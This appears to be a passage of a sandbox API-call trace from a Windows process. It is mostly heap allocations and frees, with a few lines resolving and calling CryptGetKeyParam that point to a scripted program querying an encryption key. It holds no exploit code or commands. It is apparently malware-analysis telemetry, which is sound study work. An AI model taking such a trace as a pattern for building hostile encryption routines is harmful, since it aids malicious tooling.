RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0088.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0088.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0088.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0088.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0088.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0088.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0088.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0088.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0088.341] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0088.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0088.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0088.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0088.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0088.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0088.341] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0088.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0088.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0088.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0088.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0088.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0088.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0088.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0088.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0088.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0088.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0088.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0088.341] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0088.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0088.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0088.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0088.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26d0 [0088.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0088.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0088.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0088.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0088.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca208 [0088.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0088.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0088.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0088.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0088.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0088.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0088.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0088.342] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0088.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0088.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0088.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0088.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0088.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0088.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0088.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0088.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0088.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0088.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0088.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0088.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0088.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796d88 [0088.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0088.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0088.343] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0088.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0088.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0088.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0088.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0088.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0088.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0088.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0088.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0088.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0088.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0088.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0088.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0088.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0088.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0088.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0088.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0088.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0088.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0088.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0088.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0088.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0088.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0088.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0088.343] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0088.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0088.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0088.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0088.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0088.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0088.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0088.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0088.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0088.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0088.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0088.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0088.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391dc8 [0088.344] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0088.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0088.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca310 [0088.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0088.344] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0088.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0088.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0088.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0088.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0088.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0088.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0088.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0088.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0088.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0088.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0088.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0088.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0088.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0088.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0088.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0088.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0088.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0088.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0088.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0088.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0088.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0088.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0088.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0088.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0088.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0088.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0088.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0088.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0088.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0088.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0088.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0088.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0088.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0088.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0088.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0088.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0088.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0088.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0088.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0088.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0088.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0088.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0088.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0088.346] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0088.346] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0088.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0088.346] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0088.346] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0088.346] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0088.346] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0088.346] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0088.346] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0088.346] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0088.346] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0088.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0088.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0088.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0088.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0088.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0088.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0088.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0088.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0088.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0088.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0088.346] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0088.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0088.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0088.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0088.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0088.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0088.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0088.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0088.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0088.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0088.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0088.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0088.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0088.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0088.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0088.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0088.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0088.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0088.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0088.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0088.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0088.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0088.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0088.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0088.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0088.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796de8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0088.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0088.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0088.348] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0088.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0088.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0088.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0088.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0088.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0088.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0088.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0088.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0088.348] CryptGetKeyParam (in: hKey=0x41ac600, dwParam=0x7, pbData=0x43e2580, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2580*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0088.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0088.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0088.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0088.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0088.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0088.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0088.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0088.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0088.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0088.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0088.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0088.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0088.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0088.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0088.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0088.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0088.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0088.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0088.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0088.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0088.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0088.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0088.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0088.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0088.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0088.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0088.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0088.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0088.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0088.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0088.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0088.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 